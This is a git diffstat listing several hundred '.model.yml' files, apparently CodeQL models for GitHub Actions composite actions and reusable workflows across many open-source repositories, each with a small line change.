.../appflowy-io_appflowy.model.yml | 2 +- .../aptos-labs_aptos-core.model.yml | 2 +- .../archivesspace_archivesspace.model.yml | 2 +- .../armadaproject_armada.model.yml | 2 +- .../composite-actions/armbian_build.model.yml | 2 +- .../auth0_auth0-java.model.yml | 2 +- .../auth0_auth0.net.model.yml | 2 +- .../auth0_auth0.swift.model.yml | 2 +- .../autogluon_autogluon.model.yml | 2 +- .../composite-actions/avaiga_taipy.model.yml | 2 +- .../aws-amplify_amplify-cli.model.yml | 2 +- ...ertools_powertools-lambda-python.model.yml | 2 +- .../aws_amazon-vpc-cni-k8s.model.yml | 2 +- .../aws_karpenter-provider-aws.model.yml | 2 +- .../awslabs_amazon-eks-ami.model.yml | 2 +- .../awslabs_aws-lambda-rust-runtime.model.yml | 2 +- .../azerothcore_azerothcore-wotlk.model.yml | 2 +- .../azure_azure-datafactory.model.yml | 2 +- .../badges_shields.model.yml | 2 +- .../balena-io_etcher.model.yml | 2 +- .../balena-os_balena-engine.model.yml | 2 +- .../ben-manes_caffeine.model.yml | 2 +- .../composite-actions/bokeh_bokeh.model.yml | 2 +- .../botpress_botpress.model.yml | 2 +- ...intree_braintree-android-drop-in.model.yml | 2 +- .../braintree_braintree_android.model.yml | 2 +- .../broadinstitute_gatk.model.yml | 2 +- .../canonical_multipass.model.yml | 2 +- .../chia-network_actions.model.yml | 2 +- .../chia-network_chia-blockchain.model.yml | 2 +- .../chipsalliance_chisel.model.yml | 2 +- .../chocobozzz_peertube.model.yml | 2 +- .../cilium_cilium-cli.model.yml | 2 +- .../composite-actions/cilium_cilium.model.yml | 2 +- .../citusdata_citus.model.yml | 2 +- .../clerk_javascript.model.yml | 2 +- .../cloud-custodian_cloud-custodian.model.yml | 2 +- .../cloudflare_workers-sdk.model.yml | 2 +- ...cloudfoundry_cloud_controller_ng.model.yml | 2 +- .../composite-actions/coder_coder.model.yml | 2 +- .../composite-actions/coil-kt_coil.model.yml | 2 +- .../commaai_openpilot.model.yml | 2 +- .../conan-io_conan-center-index.model.yml | 2 +- .../corretto_corretto-8.model.yml | 2 +- .../cosmos_cosmos-sdk.model.yml | 2 +- .../composite-actions/coturn_coturn.model.yml | 2 +- .../crunchydata_postgres-operator.model.yml | 2 +- .../composite-actions/cvc5_cvc5.model.yml | 2 +- .../composite-actions/d2l-ai_d2l-en.model.yml | 2 +- ...build-check-deploy-gradle-action.model.yml | 2 +- .../datadog_dd-trace-dotnet.model.yml | 2 +- .../datadog_dd-trace-go.model.yml | 2 +- .../datadog_dd-trace-js.model.yml | 2 +- .../datafuselabs_databend.model.yml | 2 +- .../davatorium_rofi.model.yml | 2 +- .../debezium_debezium.model.yml | 2 +- .../defenseunicorns_zarf.model.yml | 2 +- ...lifiees_demarches-simplifiees.fr.model.yml | 2 +- ...of-veterans-affairs_vets-website.model.yml | 2 +- .../devexpress_devextreme.model.yml | 2 +- .../diggerhq_digger.model.yml | 2 +- .../diku-dk_futhark.model.yml | 2 +- .../discourse_.github.model.yml | 2 +- .../dnsjava_dnsjava.model.yml | 2 +- .../dotintent_react-native-ble-plx.model.yml | 2 +- .../dotnet_docs-tools.model.yml | 2 +- .../dotnet_dotnet-monitor.model.yml | 2 +- .../dragonflydb_dragonfly.model.yml | 2 +- .../drawpile_drawpile.model.yml | 2 +- .../eksctl-io_eksctl.model.yml | 2 +- .../elastic_apm-agent-dotnet.model.yml | 2 +- .../elastic_apm-agent-java.model.yml | 2 +- .../elastic_apm-server.model copy.yml | 2 +- .../elementor_elementor.model.yml | 2 +- .../composite-actions/emberjs_data.model.yml | 2 +- .../composite-actions/emqx_emqx.model.yml | 2 +- .../eonasdan_tempus-dominus.model.yml | 2 +- .../composite-actions/erlang_otp.model.yml | 2 +- .../esphome_esphome.model.yml | 2 +- .../composite-actions/expensify_app.model.yml | 2 +- .../composite-actions/expo_expo.model.yml | 2 +- .../expo_vscode-expo.model.yml | 2 +- ...xternal-secrets_external-secrets.model.yml | 2 +- .../facebook_buck2.model.yml | 2 +- .../composite-actions/facebook_flow.model.yml | 2 +- .../composite-actions/facebook_yoga.model.yml | 2 +- .../facebookresearch_xformers.model.yml | 2 +- .../fastly_compute-actions.model.yml | 2 +- .../composite-actions/felangel_bloc.model.yml | 2 +- .../firebase_firebase-ios-sdk.model.yml | 2 +- .../flagsmith_flagsmith.model.yml | 2 +- .../flaxengine_flaxengine.model.yml | 2 +- ...pperdevices_flipperzero-firmware.model.yml | 2 +- .../composite-actions/fluxcd_flux2.model.yml | 2 +- .../forcedotcom_salesforcedx-vscode.model.yml | 2 +- .../fossasia_visdom.model.yml | 2 +- .../freckle_stack-action.model.yml | 2 +- .../freeradius_freeradius-server.model.yml | 2 +- .../composite-actions/gaphor_gaphor.model.yml | 2 +- .../getsentry_action-release.model.yml | 2 +- .../github_codeql-action.model.yml | 2 +- .../composite-actions/github_ruby.model.yml | 2 +- .../gittools_gitversion.model.yml | 2 +- .../go-spatial_tegola.model.yml | 2 +- .../goauthentik_authentik.model.yml | 2 +- .../godotengine_godot.model.yml | 2 +- .../composite-actions/google_dagger.model.yml | 2 +- .../googleapis_java-cloud-bom.model.yml | 2 +- .../googleapis_sdk-platform-java.model.yml | 2 +- ...ecloudplatform_dataflowtemplates.model.yml | 4 +- ...ooglecloudplatform_magic-modules.model.yml | 2 +- .../gravitational_teleport.model.yml | 2 +- .../grote_transportr.model.yml | 2 +- .../hashicorp_nomad.model.yml | 2 +- .../hashicorp_terraform.model.yml | 2 +- .../hashicorp_vault.model.yml | 4 +- .../home-assistant_android.model.yml | 2 +- .../homebrew_actions.model.yml | 2 +- ...erledger_aries-cloudagent-python.model.yml | 2 +- .../hyperledger_fabric-samples.model.yml | 2 +- .../igniterealtime_openfire.model.yml | 2 +- .../infracost_actions.model.yml | 2 +- ...nspektor-gadget_inspektor-gadget.model.yml | 2 +- .../intel-analytics_ipex-llm.model.yml | 2 +- .../ionic-team_ionic-framework.model.yml | 2 +- .../ionic-team_ionicons.model.yml | 2 +- .../ionic-team_stencil.model.yml | 2 +- .../composite-actions/ipfs_aegir.model.yml | 2 +- .../jetbrains_jetbrainsruntime.model.yml | 2 +- .../jhipster_generator-jhipster.model.yml | 4 +- .../jsocol_django-ratelimit.model.yml | 2 +- .../juicedata_juicefs.model.yml | 2 +- .../jupyter_docker-stacks.model.yml | 2 +- .../keycloak_keycloak.model.yml | 2 +- .../composite-actions/kserve_kserve.model.yml | 2 +- .../kubeflow_katib.model.yml | 2 +- .../kubeflow_training-operator.model.yml | 2 +- .../kubernetes-sigs_karpenter.model.yml | 2 +- .../kubernetes-sigs_kwok.model.yml | 2 +- .../kubescape_kubescape.model.yml | 2 +- .../kubeshop_botkube.model.yml | 2 +- .../kyverno_kyverno.model.yml | 2 +- .../composite-actions/lancedb_lance.model.yml | 2 +- .../launchdarkly_ios-client-sdk.model.yml | 2 +- .../layer5labs_meshmap-snapshot.model.yml | 2 +- .../ldc-developers_ldc.model.yml | 2 +- .../ledgerhq_ledger-live.model.yml | 2 +- .../composite-actions/lerna_lerna.model.yml | 2 +- .../composite-actions/lf-edge_eve.model.yml | 2 +- .../libgit2_libgit2.model.yml | 2 +- .../lightning-ai_pytorch-lightning.model.yml | 2 +- .../lightning-ai_torchmetrics.model.yml | 2 +- .../linkerd_linkerd2.model.yml | 4 +- .../logseq_publish-spa.model.yml | 2 +- .../macvim-dev_macvim.model.yml | 2 +- .../mamba-org_mamba.model.yml | 2 +- .../maplibre_maplibre-native.model.yml | 2 +- .../mastodon_mastodon.model.yml | 2 +- .../mavlink_qgroundcontrol.model.yml | 2 +- .../mdanalysis_mdanalysis.model.yml | 2 +- .../medic_cht-core.model.yml | 2 +- .../medusajs_medusa.model.yml | 2 +- .../metabase_metabase.model.yml | 2 +- ...etamask_action-create-release-pr.model.yml | 2 +- .../metamask_action-npm-publish.model.yml | 2 +- .../microsoft_fluentui.model.yml | 2 +- .../microsoft_playwright.model.yml | 2 +- .../composite-actions/microsoft_wsl.model.yml | 2 +- .../milvus-io_milvus.model.yml | 2 +- .../composite-actions/mlflow_mlflow.model.yml | 2 +- .../modin-project_modin.model.yml | 2 +- .../mozilla_addons-server.model.yml | 2 +- .../mozilla_bedrock.model.yml | 2 +- .../mozilla_sccache.model.yml | 2 +- .../msys2_setup-msys2.model.yml | 2 +- .../mumble-voip_mumble.model.yml | 2 +- .../composite-actions/nasa_fprime.model.yml | 2 +- .../nats-io_nats-server.model.yml | 2 +- ..._optic-release-automation-action.model.yml | 2 +- .../composite-actions/nektos_act.model.yml | 2 +- ...4j-contrib_neo4j-apoc-procedures.model.yml | 2 +- .../neondatabase_neon.model.yml | 2 +- .../composite-actions/neovim_neovim.model.yml | 2 +- .../composite-actions/nhost_nhost.model.yml | 2 +- .../nix-community_nixos-wsl.model.yml | 2 +- .../composite-actions/novuhq_novu.model.yml | 4 +- .../composite-actions/nymtech_nym.model.yml | 2 +- .../obsproject_obs-studio.model.yml | 2 +- .../composite-actions/ocaml_dune.model.yml | 2 +- .../oneflow-inc_oneflow.model.yml | 2 +- ...metry_opentelemetry-ruby-contrib.model.yml | 2 +- ...pen-telemetry_opentelemetry-ruby.model.yml | 2 +- .../open-watcom_open-watcom-v2.model.yml | 2 +- .../openapitools_openapi-generator.model.yml | 2 +- .../composite-actions/openjdk_jdk.model.yml | 2 +- ...pensearch-project_opensearch-net.model.yml | 2 +- .../opensearch-project_security.model.yml | 2 +- .../opentrons_opentrons.model.yml | 2 +- .../openvinotoolkit_openvino.model.yml | 2 +- ...enzeppelin-contracts-upgradeable.model.yml | 2 +- ...nzeppelin_openzeppelin-contracts.model.yml | 2 +- .../composite-actions/oppia_oppia.model.yml | 2 +- .../composite-actions/oracle_graal.model.yml | 2 +- .../oracle_truffleruby.model.yml | 2 +- .../orhun_git-cliff.model.yml | 2 +- .../composite-actions/oven-sh_bun.model.yml | 2 +- .../owntracks_android.model.yml | 2 +- .../pandas-dev_pandas.model.yml | 2 +- .../pardeike_harmony.model.yml | 2 +- .../pennylaneai_pennylane.model.yml | 2 +- .../phalcon_cphalcon.model.yml | 2 +- .../philosowaffle_peloton-to-garmin.model.yml | 4 +- .../composite-actions/php_php-src.model.yml | 2 +- .../phpdocumentor_phpdocumentor.model.yml | 2 +- ...necone-io_pinecone-python-client.model.yml | 2 +- .../composite-actions/pixijs_pixijs.model.yml | 2 +- .../posthog_posthog.model.yml | 2 +- .../composite-actions/primer_react.model.yml | 2 +- .../project-chip_connectedhomeip.model.yml | 2 +- .../projectnessie_nessie.model.yml | 2 +- .../composite-actions/psf_black.model.yml | 2 +- .../pyca_cryptography.model.yml | 2 +- .../pyg-team_pytorch_geometric.model.yml | 2 +- .../python-poetry_poetry.model.yml | 2 +- .../composite-actions/python_mypy.model.yml | 2 +- .../quarto-dev_quarto-cli.model.yml | 2 +- .../composite-actions/quay_clair.model.yml | 2 +- .../quickwit-oss_quickwit.model.yml | 2 +- .../composite-actions/r-lib_actions.model.yml | 2 +- .../randombit_botan.model.yml | 2 +- .../raspberrypi_documentation.model.yml | 2 +- .../ray-project_kuberay.model.yml | 2 +- .../readthedocs_actions.model.yml | 2 +- .../reflex-dev_reflex.model.yml | 2 +- .../renovatebot_renovate.model.yml | 2 +- .../rethinkdb_rethinkdb.model.yml | 2 +- .../composite-actions/risc0_risc0.model.yml | 2 +- .../rocketchat_rocket.chat.model.yml | 2 +- .../composite-actions/rook_rook.model.yml | 2 +- .../composite-actions/roots_trellis.model.yml | 2 +- .../composite-actions/ruby_debug.model.yml | 2 +- .../composite-actions/ruby_ruby.model.yml | 2 +- .../composite-actions/rusefi_rusefi.model.yml | 2 +- .../saltstack_salt.model.yml | 2 +- .../composite-actions/saltstack_salt.yml | 2 +- .../sap_sapmachine.model.yml | 2 +- .../scala-native_scala-native.model.yml | 2 +- .../composite-actions/scitools_iris.model.yml | 2 +- .../scylladb_scylla-operator.model.yml | 2 +- .../shader-slang_slang.model.yml | 2 +- .../shaka-project_shaka-player.model.yml | 2 +- ...ode_react-webpack-rails-tutorial.model.yml | 2 +- .../simple-icons_simple-icons.model.yml | 2 +- .../slint-ui_slint.model.yml | 2 +- .../solidusio_solidus.model.yml | 2 +- .../composite-actions/solo-io_gloo.model.yml | 2 +- .../composite-actions/sonarr_sonarr.model.yml | 2 +- .../sonic-pi-net_sonic-pi.model.yml | 2 +- .../spacedriveapp_spacedrive.model.yml | 2 +- .../spockframework_spock.model.yml | 2 +- .../spring-io_initializr.model.yml | 2 +- .../spring-io_start.spring.io.model.yml | 2 +- .../spring-projects_spring-boot.model.yml | 2 +- ...spring-projects_spring-framework.model.yml | 2 +- .../spring-projects_spring-graphql.model.yml | 2 +- .../square_workflow-kotlin.model.yml | 2 +- .../stefanprodan_podinfo.model.yml | 2 +- .../composite-actions/stellar_go.model.yml | 2 +- .../streetsidesoftware_cspell.model.yml | 4 +- .../subquery_subql.model.yml | 2 +- .../swagger-api_swagger-codegen.model.yml | 2 +- .../swagger-api_swagger-parser.model.yml | 2 +- .../tarantool_tarantool.model.yml | 2 +- .../telepresenceio_telepresence.model.yml | 2 +- .../tensorflow_datasets.model.yml | 2 +- .../texstudio-org_texstudio.model.yml | 2 +- .../toeverything_affine.model.yml | 2 +- .../treeverse_lakefs.model.yml | 2 +- .../trezor_trezor-firmware.model.yml | 2 +- .../tribler_tribler.model.yml | 2 +- .../trunk-io_trunk-action.model.yml | 2 +- .../composite-actions/unidata_metpy.model.yml | 2 +- .../unstructured-io_unstructured.model.yml | 2 +- .../composite-actions/vercel_turbo.model.yml | 2 +- .../vesoft-inc_nebula.model.yml | 2 +- .../composite-actions/vkcom_vkui.model.yml | 2 +- .../vuetifyjs_vuetify.model.yml | 2 +- .../wagoodman_dive.model.yml | 2 +- ...lletconnect_walletconnectswiftv2.model.yml | 2 +- .../composite-actions/wazuh_wazuh.model.yml | 2 +- .../web-infra-dev_rspack.model.yml | 2 +- .../webassembly_wabt.model.yml | 2 +- .../composite-actions/wntrblm_nox.model.yml | 2 +- .../composite-actions/xrplf_rippled.model.yml | 2 +- .../composite-actions/zcash_zcash.model.yml | 2 +- .../zenml-io_zenml.model.yml | 2 +- .../composite-actions/zeroc-ice_ice.model.yml | 2 +- .../0xpolygon_polygon-edge.model.yml | 2 +- .../reusable-workflows/8vim_8vim.model.yml | 2 +- .../actions_reusable-workflows.model.yml | 2 +- .../reusable-workflows/adap_flower.model.yml | 2 +- .../aio-libs_multidict.model.yml | 2 +- .../aio-libs_yarl.model.yml | 2 +- .../airbytehq_airbyte.model.yml | 2 +- .../alphagov_collections.model.yml | 2 +- .../alphagov_frontend.model.yml | 2 +- .../alphagov_publishing-api.model.yml | 2 +- .../reusable-workflows/apache_druid.model.yml | 2 +- .../reusable-workflows/apache_flink.model.yml | 2 +- .../reusable-workflows/apache_spark.model.yml | 2 +- .../argilla-io_argilla.model.yml | 2 +- .../argoproj_argo-cd.model.yml | 2 +- .../argoproj_argo-rollouts.model.yml | 2 +- .../aws-amplify_amplify-ui.model.yml | 2 +- .../reusable-workflows/azure_apiops.model.yml | 2 +- .../azure_mlops-templates.model.yml | 2 +- .../bbq-beets_avocaddo-cmw.model.yml | 2 +- .../bbq-beets_mobile-ci-cd.model.yml | 2 +- .../bbq-beets_yujincat-action.model.yml | 2 +- .../bdunderscore_modular-avatar.model.yml | 2 +- .../benc-uk_workflow-dispatch.model.yml | 2 +- .../bridgecrewio_checkov.model.yml | 2 +- .../bugsnag_bugsnag-ruby.model.yml | 2 +- ...ecodealliance_wasm-micro-runtime.model.yml | 2 +- .../celo-org_celo-blockchain.model.yml | 2 +- .../cemu-project_cemu.model.yml | 2 +- .../cesiumgs_cesium-unreal.model.yml | 2 +- .../reusable-workflows/cgal_cgal.model.yml | 2 +- .../checkstyle_checkstyle.model.yml | 2 +- .../chia-network_actions.model.yml | 2 +- .../chipsalliance_chisel.model.yml | 2 +- .../clickhouse_clickhouse.model.yml | 2 +- .../cloudfoundry_cli.model.yml | 2 +- ...thub-action-matrix-outputs-write.model.yml | 2 +- .../cocotb_cocotb.model.yml | 2 +- .../codeigniter4_codeigniter4.model.yml | 2 +- .../com-lihaoyi_mill.model.yml | 2 +- .../cosmos_ibc-go.model.yml | 2 +- .../crowdsecurity_crowdsec.model.yml | 2 +- .../cryptomator_cryptomator.model.yml | 2 +- .../daeuniverse_dae.model.yml | 2 +- .../dafny-lang_dafny.model.yml | 2 +- .../dagger_dagger.model.yml | 2 +- .../dash-industry-forum_dash.js.model.yml | 2 +- .../datadog_dd-trace-go.model.yml | 2 +- .../datadog_dd-trace-py.model.yml | 2 +- .../datafuselabs_databend.model.yml | 2 +- .../dbt-labs_dbt-bigquery.model.yml | 2 +- .../dbt-labs_dbt-core.model.yml | 2 +- .../dbt-labs_dbt-snowflake.model.yml | 2 +- .../decidim_decidim.model.yml | 2 +- .../defectdojo_django-defectdojo.model.yml | 2 +- ...dependencytrack_dependency-track.model.yml | 2 +- .../devexpress_testcafe.model.yml | 2 +- .../dfhack_dfhack.model.yml | 2 +- .../docker_build-push-action.model.yml | 2 +- .../dragonwell-project_dragonwell11.model.yml | 2 +- .../earthly_earthly.model.yml | 2 +- .../eclipse-vertx_vert.x.model.yml | 2 +- .../eclipse-vertx_vertx-sql-client.model.yml | 2 +- .../elastic_elasticsearch-net.model.yml | 2 +- .../element-hq_element-desktop.model.yml | 4 +- .../envoyproxy_envoy.model.yml | 2 +- .../etcd-io_bbolt.model.yml | 2 +- .../reusable-workflows/etcd-io_etcd.model.yml | 2 +- .../eventstore_eventstore.model.yml | 2 +- .../expensify_app.model.yml | 2 +- ...xternal-secrets_external-secrets.model.yml | 2 +- .../facebook_create-react-app.model.yml | 2 +- .../facebookresearch_xformers.model.yml | 2 +- .../falcosecurity_falco.model.yml | 2 +- .../fastify_fastify.model.yml | 2 +- .../ferretdb_ferretdb.model.yml | 2 +- .../filecoin-project_venus.model.yml | 2 +- .../firebase_firebase-unity-sdk.model.yml | 2 +- .../flarum_framework.model.yml | 2 +- .../fluent_fluent-bit.model.yml | 2 +- .../flux-iac_tofu-controller.model.yml | 2 +- .../flyteorg_flyte.model.yml | 2 +- .../foundatiofx_foundatio.model.yml | 2 +- .../freecad_freecad.model.yml | 2 +- .../getpelican_pelican.model.yml | 2 +- .../getporter_porter.model.yml | 2 +- .../getsentry_sentry-dart.model.yml | 2 +- .../getsentry_sentry-unity.model.yml | 2 +- .../gitpod-io_gitpod.model.yml | 2 +- .../gittools_gitversion.model.yml | 2 +- ...ooglecloudplatform_magic-modules.model.yml | 2 +- ...loudplatform_nodejs-docs-samples.model.yml | 2 +- .../gravitational_teleport.model.yml | 2 +- .../gravitl_netmaker.model.yml | 2 +- .../reusable-workflows/h2oai_wave.model.yml | 2 +- .../hadashia_vcontainer.model.yml | 2 +- .../hashgraph_hedera-services.model.yml | 2 +- .../hashicorp_boundary.model.yml | 2 +- .../hashicorp_consul.model.yml | 2 +- .../hashicorp_terraform-cdk.model.yml | 2 +- ...hashicorp_terraform-provider-tfe.model.yml | 2 +- .../hashicorp_terraform.model.yml | 2 +- .../hashicorp_vault.model.yml | 4 +- .../reusable-workflows/heroku_cli.model.yml | 2 +- .../hitobito_hitobito.model.yml | 4 +- .../home-assistant_operating-system.model.yml | 2 +- .../homuler_mediapipeunityplugin.model.yml | 2 +- .../huggingface_doc-builder.model.yml | 2 +- .../huggingface_transformers.model.yml | 2 +- .../hyperion-project_hyperion.ng.model.yml | 2 +- .../reusable-workflows/ibm_sarama.model.yml | 2 +- ...nloader_icloud_photos_downloader.model.yml | 2 +- .../immich-app_immich.model.yml | 2 +- .../reusable-workflows/inria_spoon.model.yml | 2 +- ...el-device-plugins-for-kubernetes.model.yml | 2 +- .../inverse-inc_packetfence.model.yml | 2 +- .../reusable-workflows/ispc_ispc.model.yml | 2 +- ..._intellij-platform-gradle-plugin.model.yml | 2 +- .../jupyter_docker-stacks.model.yml | 2 +- .../kairos-io_kairos.model.yml | 2 +- .../kanidm_kanidm.model.yml | 2 +- .../kata-containers_kata-containers.model.yml | 2 +- .../reusable-workflows/kiali_kiali.model.yml | 2 +- .../kotest_kotest.model.yml | 2 +- .../kubernetes_ingress-nginx.model.yml | 2 +- .../kubescape_kubescape.model.yml | 2 +- .../kubeshop_botkube.model.yml | 4 +- .../reusable-workflows/kumahq_kuma.model.yml | 2 +- .../labring_sealos.model.yml | 2 +- .../laion-ai_open-assistant.model.yml | 2 +- .../learningequality_kolibri.model.yml | 2 +- .../lensesio_stream-reactor.model.yml | 2 +- .../leptos-rs_leptos.model.yml | 2 +- .../lightning-ai_pytorch-lightning.model.yml | 2 +- .../liquibase_liquibase.model.yml | 2 +- .../litestar-org_litestar.model.yml | 2 +- .../reusable-workflows/llvm_circt.model.yml | 2 +- .../lnbits_lnbits.model.yml | 2 +- .../lutris_lutris.model.yml | 2 +- .../reusable-workflows/mailu_mailu.model.yml | 2 +- .../mamba-org_mamba.model.yml | 2 +- ...anticoresoftware_manticoresearch.model.yml | 2 +- .../marcelotduarte_cx_freeze.model.yml | 2 +- ...xaml_materialdesigninxamltoolkit.model.yml | 2 +- .../matter-labs_zksync-era.model.yml | 2 +- .../mattermost_desktop.model.yml | 2 +- .../mattermost_mattermost.model.yml | 2 +- .../mealie-recipes_mealie.model.yml | 2 +- .../meshery_meshery.model.yml | 2 +- .../meshtastic_firmware.model.yml | 2 +- .../microcks_microcks.model.yml | 2 +- ...crosoft_applicationinsights-java.model.yml | 2 +- .../microsoft_chat-copilot.model.yml | 2 +- .../microsoft_msquic.model.yml | 2 +- .../microsoft_oryx.model.yml | 2 +- .../microsoft_pr-metrics.model.yml | 2 +- ...oft_react-native-windows-samples.model.yml | 2 +- .../microsoft_vscode-cpptools.model.yml | 2 +- .../moby_buildkit.model.yml | 2 +- .../reusable-workflows/moby_moby.model.yml | 2 +- .../mosaicml_composer.model.yml | 2 +- .../msys2_setup-msys2.model.yml | 2 +- .../mudler_localai.model.yml | 2 +- .../mustardchef_wsabuilds.model.yml | 2 +- .../reusable-workflows/n8n-io_n8n.model.yml | 2 +- .../napari_napari.model.yml | 2 +- .../reusable-workflows/nasa_fprime.model.yml | 2 +- .../nautobot_nautobot.model.yml | 2 +- .../reusable-workflows/nektos_act.model.yml | 2 +- .../neondatabase_neon.model.yml | 2 +- .../neovim_neovim.model.yml | 2 +- .../nethermindeth_nethermind.model.yml | 2 +- .../newrelic_newrelic-dotnet-agent.model.yml | 2 +- .../newrelic_newrelic-java-agent.model.yml | 2 +- .../newrelic_node-newrelic.model.yml | 2 +- .../nexus-mods_nexusmods.app.model.yml | 2 +- .../nginxinc_kubernetes-ingress.model.yml | 2 +- .../nocodb_nocodb.model.yml | 2 +- .../reusable-workflows/novuhq_novu.model.yml | 2 +- .../npm_abbrev-js.model.yml | 2 +- .../reusable-workflows/npm_cli.model.yml | 2 +- .../npm_fs-minipass.model.yml | 2 +- .../npm_hosted-git-info.model.yml | 2 +- .../reusable-workflows/npm_ini.model.yml | 2 +- ...pm_json-parse-even-better-errors.model.yml | 2 +- .../npm_minify-registry-metadata.model.yml | 2 +- .../npm_mute-stream.model.yml | 2 +- .../npm_node-semver.model.yml | 2 +- .../npm_node-which.model.yml | 2 +- .../reusable-workflows/npm_nopt.model.yml | 2 +- .../npm_normalize-package-data.model.yml | 2 +- .../npm_write-file-atomic.model.yml | 2 +- .../onflow_cadence.model.yml | 2 +- .../open-goal_jak-project.model.yml | 2 +- ...pen-telemetry_opentelemetry-demo.model.yml | 2 +- ...try_opentelemetry-dotnet-contrib.model.yml | 2 +- ...n-telemetry_opentelemetry-dotnet.model.yml | 2 +- ...entelemetry-java-instrumentation.model.yml | 2 +- ...lemetry_opentelemetry-js-contrib.model.yml | 2 +- ...telemetry_opentelemetry-operator.model.yml | 2 +- .../openbao_openbao.model.yml | 2 +- .../openhab_openhab-docs.model.yml | 2 +- .../openmined_pysyft.model.yml | 2 +- .../opentofu_opentofu.model.yml | 2 +- .../openttd_openttd.model.yml | 2 +- .../openvinotoolkit_openvino.model.yml | 2 +- .../reusable-workflows/openxla_iree.model.yml | 2 +- .../reusable-workflows/openzfs_zfs.model.yml | 2 +- ...ator-framework_java-operator-sdk.model.yml | 2 +- .../orange-opensource_hurl.model.yml | 2 +- ...aolosalvatori_servicebusexplorer.model.yml | 2 +- .../parcel-bundler_parcel.model.yml | 2 +- .../pardeike_harmony.model.yml | 2 +- .../reusable-workflows/pcsx2_pcsx2.model.yml | 2 +- .../pennylaneai_pennylane.model.yml | 2 +- ...necone-io_pinecone-python-client.model.yml | 2 +- .../pixie-io_pixie.model.yml | 2 +- .../plantuml_plantuml.model.yml | 2 +- .../powerdns_pdns.model.yml | 2 +- .../preactjs_preact.model.yml | 2 +- .../prismlauncher_prismlauncher.model.yml | 2 +- .../product-os_flowzone.model.yml | 2 +- .../project-oak_oak.model.yml | 2 +- .../reusable-workflows/prql_prql.model.yml | 2 +- .../pulumi_pulumi.model.yml | 2 +- .../puppeteer_puppeteer.model.yml | 2 +- .../puppetlabs_puppetlabs-puppetdb.model.yml | 2 +- .../reusable-workflows/pyo3_maturin.model.yml | 2 +- .../reusable-workflows/pyo3_pyo3.model.yml | 2 +- .../python_cpython.model.yml | 2 +- .../pytorch_botorch.model.yml | 2 +- .../reusable-workflows/pytorch_xla.model.yml | 2 +- .../quarto-dev_quarto-cli.model.yml | 2 +- .../rancher_dashboard.model.yml | 2 +- .../rasterio_rasterio.model.yml | 2 +- .../redisearch_redisearch.model.yml | 2 +- .../remix-run_remix.model.yml | 2 +- .../rmcrackan_libation.model.yml | 2 +- .../rocketchat_rocket.chat.model.yml | 2 +- .../ruby_ruby.wasm.model.yml | 2 +- .../rustdesk_rustdesk.model.yml | 2 +- .../saadeghi_daisyui.model.yml | 2 +- .../sagemath_sage.model.yml | 2 +- .../schemastore_schemastore.model.yml | 2 +- .../scikit-learn_scikit-learn.model.yml | 2 +- .../seleniumhq_selenium.model.yml | 2 +- .../shaka-project_shaka-packager.model.yml | 2 +- .../shaka-project_shaka-player.model.yml | 2 +- .../shimataro_ssh-key-action.model.yml | 2 +- .../softfever_orcaslicer.model.yml | 2 +- ...-mansion_react-native-reanimated.model.yml | 2 +- .../solana-labs_solana.model.yml | 2 +- .../sonarr_sonarr.model.yml | 2 +- .../speedb-io_speedb.model.yml | 2 +- ...ring-cloud_spring-cloud-dataflow.model.yml | 2 +- .../sqlfluff_sqlfluff.model.yml | 2 +- .../stdlib-js_stdlib.model.yml | 2 +- .../stereokit_stereokit.model.yml | 2 +- .../streetsidesoftware_cspell.model.yml | 4 +- .../supabase_auth.model.yml | 2 +- .../reusable-workflows/supabase_cli.model.yml | 2 +- .../tencent_hippy.model.yml | 4 +- .../tgstation_tgstation.model.yml | 2 +- .../thesofproject_sof.model.yml | 2 +- .../tiann_kernelsu.model.yml | 2 +- .../tiledb-inc_tiledb.model.yml | 2 +- .../toeverything_affine.model.yml | 2 +- .../tracel-ai_burn.model.yml | 2 +- .../tribler_tribler.model.yml | 2 +- .../ubisoft_sharpmake.model.yml | 2 +- .../unity-technologies_ml-agents.model.yml | 2 +- .../reusable-workflows/urbit_urbit.model.yml | 2 +- .../uyuni-project_uyuni.model.yml | 2 +- .../vert-x3_vertx-hazelcast.model.yml | 2 +- .../reusable-workflows/vkcom_vkui.model.yml | 2 +- .../walletconnect_web3modal.model.yml | 2 +- .../warzone2100_warzone2100.model.yml | 2 +- .../wasmedge_wasmedge.model.yml | 2 +- .../web-infra-dev_rspack.model.yml | 2 +- .../reusable-workflows/werf_werf.model.yml | 2 +- .../widdix_aws-cf-templates.model.yml | 2 +- .../wildfly_wildfly.model.yml | 2 +- .../yt-dlp_yt-dlp.model.yml | 2 +- .../zenml-io_zenml.model.yml | 2 +- .../zephyrproject-rtos_zephyr.model.yml | 2 +- .../zitadel_zitadel.model.yml | 4 +- ql/lib/ext/getsentry_action-release.model.yml | 2 +- ql/lib/ext/github_codeql-action.model.yml | 2 +- .../ext/go-semantic-release_action.model.yml | 2 +- .../golangci_golangci-lint-action.model.yml | 2 +- .../ext/gonuit_heroku-docker-deploy.model.yml | 2 +- .../goreleaser_goreleaser-action.model.yml | 2 +- ...te-or-update-pull-request-action.model.yml | 2 +- .../ext/gradle_gradle-build-action.model.yml | 2 +- ql/lib/ext/haya14busa_action-cond.model.yml | 2 +- ql/lib/ext/hexlet_project-action.model.yml | 2 +- ql/lib/ext/ilammy_msvc-dev-cmd.model.yml | 2 +- ql/lib/ext/ilammy_setup-nasm.model.yml | 2 +- ql/lib/ext/imjohnbo_issue-bot.model.yml | 2 +- ql/lib/ext/iterative_setup-cml.model.yml | 2 +- ql/lib/ext/iterative_setup-dvc.model.yml | 2 +- ...sives_github-pages-deploy-action.model.yml | 2 +- .../ext/jitterbit_get-changed-files.model.yml | 2 +- .../ext/johnnymorganz_stylua-action.model.yml | 2 +- ql/lib/ext/jsdaniell_create-json.model.yml | 2 +- .../ext/jurplel_install-qt-action.model.yml | 2 +- ql/lib/ext/jwalton_gh-ecr-push.model.yml | 4 +- ...han_pull-request-comment-trigger.model.yml | 2 +- ...leci-artifacts-redirector-action.model.yml | 2 +- ql/lib/ext/leafo_gh-actions-lua.model.yml | 2 +- .../ext/leafo_gh-actions-luarocks.model.yml | 2 +- .../lucasbento_auto-close-issues.model.yml | 2 +- ..._actions-find-and-replace-string.model.yml | 2 +- ql/lib/ext/magefile_mage-action.model.yml | 2 +- ql/lib/ext/maierj_fastlane-action.model.yml | 2 +- .../manusa_actions-setup-minikube.model.yml | 2 +- ql/lib/ext/marocchino_on_artifact.model.yml | 2 +- ql/lib/ext/mattdavis0351_actions.model.yml | 4 +- .../ext/meteorengineer_setup-meteor.model.yml | 2 +- 